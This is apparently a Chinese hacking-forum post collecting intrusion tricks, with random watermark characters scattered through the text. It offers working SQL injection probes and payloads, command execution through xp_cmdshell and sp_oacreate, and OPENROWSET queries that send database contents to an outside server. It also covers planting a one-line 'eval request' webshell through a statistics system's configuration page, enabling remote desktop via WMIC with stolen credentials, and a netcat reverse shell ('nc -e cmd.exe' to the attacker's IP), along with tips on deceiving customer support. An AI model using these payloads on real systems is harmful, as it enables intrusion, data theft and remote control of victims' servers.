SA点数据库分离技术相关
/ M8 | G: O( g, Z# U& q4 y- s
4 c" N2 o* c Y* h+ z# I1 U0 J/ b2 K+ j9 B! Q/ }" n: _+ t, P
SA点数据库分离搞法+语句:
* A' o8 ?! Y. ]* O. q5 r4 a
/ w3 t" u# D5 ]$ D- U8 W! d7 r8 t注射点不显错,执行下面三条语句页面都返回正常。
0 J$ U* [1 O: T3 C( gand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
) l. X5 r1 X- d. D/ `and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')4 A9 R' ~4 o* @8 X- w1 f9 D& m* U+ C
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')( y" q3 l4 [/ M9 l
可以列目录,判断系统为2000,web与数据库分离8 O- X7 J% Q% T8 X, t1 w
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。+ d# ?6 _# L1 a+ i# S* S$ [; G5 W
在注射点上执行
' v/ @5 a6 T0 M# Q5 adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
0 Q& ]$ V4 t! D+ P X' W页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
$ ^7 C" t4 ?4 Y6 f, s/ t6 Z& d$ i还有我用NC监听得其他端口都没有得到IP。 q: r( @& V6 C, d% I1 Y
S- r& m; S: ~0 s
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
% N* d# W0 l3 P: f* p3 O; n'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--& I1 | w+ \3 Y4 }. L% F
6 e' V9 L+ w& Z6 D" U- a;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
2 T( e/ l( V( n
* d% y3 {+ B: A8 p" S现在就猜想是不是数据库是内网而且不能连外网。8 y% e' I( h8 f1 Z) f7 i
; d0 d4 B* f, _1 g" ?6 B0 ~
3 _7 S0 d" k- f! K2 {+ ^
access导出txt文本代码
/ C8 Y0 g. M( k) l! \2 ?SELECT * into [test.txt] in 'd:\web\' 'text;' from admin, Y: N8 v4 |: _, w! L2 T6 S
7 v' @& o$ ]1 M. q" p" M' O' @/ a# x+ ?3 ]
: `4 H" z s) T) Y& I; Q" F自动跳转到指定网站代码头6 k- d2 |$ A7 d
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
# W8 O* o" e) O' @% ]# Y; N& y( o' k6 K
% x1 q Z& [& [9 n8 N0 D4 Z' W7 e
入侵java or jsp站点时默认配置文件路径:
$ s: G8 u+ j1 |/ P\web-inf\web.xml* K8 M" u9 N% K g
tomcat下的配置文件位置:1 k+ F/ ]! o) o9 @) ~ p; {
\conf\server.xml (前面加上tomcat路径)
0 m: E. p4 I* b3 y& F9 L\Tomcat 5.0\webapps\root\web-inf\struts-config.xml \! D0 E9 |% ~
4 f8 k$ a1 T& f
9 n& b% i8 P+ M U+ o9 C
* F% ]. |/ G3 E- X ^( g检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
) L9 o' k, ~4 b+ E$ H% R-1%23
! e, d, Y0 r8 ?' x% c2 _ K>
3 q. M- A% {$ x<
* ]/ y# M- u# k* W8 Z1'+or+'1'='1
& U) n9 g; D) d4 O6 e" m/ S0 f; c! yid=8%bf) [& U" H% w- d$ _% @" f" B
2 G3 m3 U$ b2 ~# |; G1 T全新注入点检测试法:
7 {$ s* Y0 N# R8 A% f在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
. m; m/ `9 S5 l- k# `$ C q5 a0 j! B6 _6 s! B6 K8 n$ \
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。9 ?5 E, m4 K+ o* }
: e( j" C& J @, u7 r/ y& z
搜索型注入判断方法:
9 }/ O. Y+ v# S3 G北京%' and '1'='1' and '%'='. a, `: x/ P# i t0 w n6 e
北京%' and '1'='2' and '%'='. Z0 l6 e' W! n3 j+ i
. \% x8 @2 q( N9 s) I* m% }
/ |: b5 j* u3 P& b! }# ^' rCOOKIES注入:7 a: v, L, D5 q& @
2 _, i# y4 G8 y5 F4 w4 U7 p& N& B
javascript:alert(document.cookie="id="+escape("51 and 1=1"));' \* m9 [/ X) n! |: A
' K4 [% t Q; |- b6 i# U) F' U
2000专业版查看本地登录用户命令:" a8 O' z+ y' i$ ?
net config workstation+ _& o4 L% @" W8 g5 f( q2 C8 K; L
x8 M2 ~ w8 T, E
' ~% d- D; L* F1 k- w$ h2003下查看ipsec配置和默认防火墙配置命令:, z* p! v/ M8 Y0 |" Q% s
netsh firewall show config
% I3 E) `9 L, snetsh ipsec static show all
! @# \* g, m/ X% h( U; _2 G) O" Z
不指派指定策略命令:
# ~ S' p: P2 ? {netsh ipsec static set policy name=test assign=n (test是不指派的策略名)3 D) F$ E, D) t9 X
netsh ipsec static show policy all 显示策略名* f! ]$ w0 D% N7 y: U' r1 k
5 s& n: K6 f& E- ^$ `
2 c6 s; a* {% C& B& k$ q6 N: F' c ~猜管理员后台小技巧:8 Z/ S8 W$ I: \2 I/ ]; ^
admin/left.asp * r3 ~. q* S; W0 ~& C$ Y+ j
admin/main.asp; h z, P. ?/ L1 N$ g3 n
admin/top.asp2 _# R8 z1 F1 G
admin/admin.asp
0 C2 Y% t+ v' Y8 J1 {% L7 z会现出菜单导航,然后迅雷下载全部链接
) {4 T# K+ J9 X; U8 d7 M+ `. x3 A/ u
' }& S7 A4 r& O- y- q社会工程学:; V( t; ?4 y- `( Z1 ]9 R
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
9 q4 o+ ]; t8 F然后去骗客服$ u/ J8 J5 a1 n3 b- \" G% N- ?
& [' _, m6 E: C/ F
2 [; F, w$ p: T( ?统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 9 \$ k( X: I3 X/ _; Y7 H' W1 T
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, % }" L' F1 m* S4 _0 T) x
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
w- Y+ K! M8 }6 A, T+ q
9 k( G) }5 [! C- C2 F0 F7 M
: n+ Y- l; [2 c2 v3 i4 n4 Y8 b8 j. Y& c6 z1 t. T: X
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
/ H6 |6 R5 `3 L
* c' w8 z3 U8 x7 N0 f
% H# Z& b5 u* {% P8 i! O0 k/ ~) y8 ?6 d# I: e1 X1 ~
CMD加密注册表位置
8 m+ U0 V, F3 g4 x; {3 H(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor1 X/ Z9 }* V! F8 f. O! @* X' y& ?
AutoRun. N; v( G+ N3 |( C* E
! r4 `! }: H/ s8 W3 W' }7 U(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
- Q E; b" [- O1 FAutoRun1 k2 R3 `- `/ [
. ]: [: E6 V* A; P3 D
# T9 m9 b3 `5 n. w1 r+ H: \- i在找注入时搜索Hidden,把他改成test/ f8 N/ M+ L4 P0 b5 h
0 X+ O' L( V4 T: B8 R7 u
3 ~" p+ S: ?- }+ T8 X( u
. {. r& V) q7 k
mstsc /v:IP /console
" K: X' ?8 n/ _1 R
& y' y$ h3 a# D" i% z, r7 P* m, `, q/ m8 c4 g x$ e
一句话开3389:
; u1 W9 f; n: @
0 h- \( o# S. \9 ^最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH> 2 X' s( w: L0 j O# P, t: r
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.5 }8 K/ a( q( H& q: F. ~. M
, P! j* S6 k+ a" `6 Y4 p) o
: F9 [' O* l5 u* ]知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
: o. H' c& e$ D) d9 |Insert into admin(user,pwd) values('test','test'). X# R( m$ l& z% x- a
1 ]. B, v; x& P( T2 z
% h( d6 ]+ N2 S/ i0 d- \
NC反弹
/ B) n1 B1 V* o$ R! Q$ L先在本机执行: nc -vv -lp 监听的端口 (自己执行) 4 i# P, R6 O& m
然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
! O1 Q1 W: @2 c: t# N- t* T0 ]7 q8 Z7 |4 `
$ I( f$ Q2 S Y8 C, N
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题) e" n& e4 \! M6 Z7 O
( I$ b% n1 @ w# t- k5 h, K
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录+ ~: }$ C1 v. `( G
例如:
: N( Z8 ]: B( m7 Rsubst k: d:\www\ 用d盘www目录替代k盘
/ K3 v6 ]0 ?% p6 esubst k: /d 解除K盘代替 |
匿名
发表于 2017-12-20 02:36:51
发表于 2012-9-15 14:41:29
收藏
支持
反对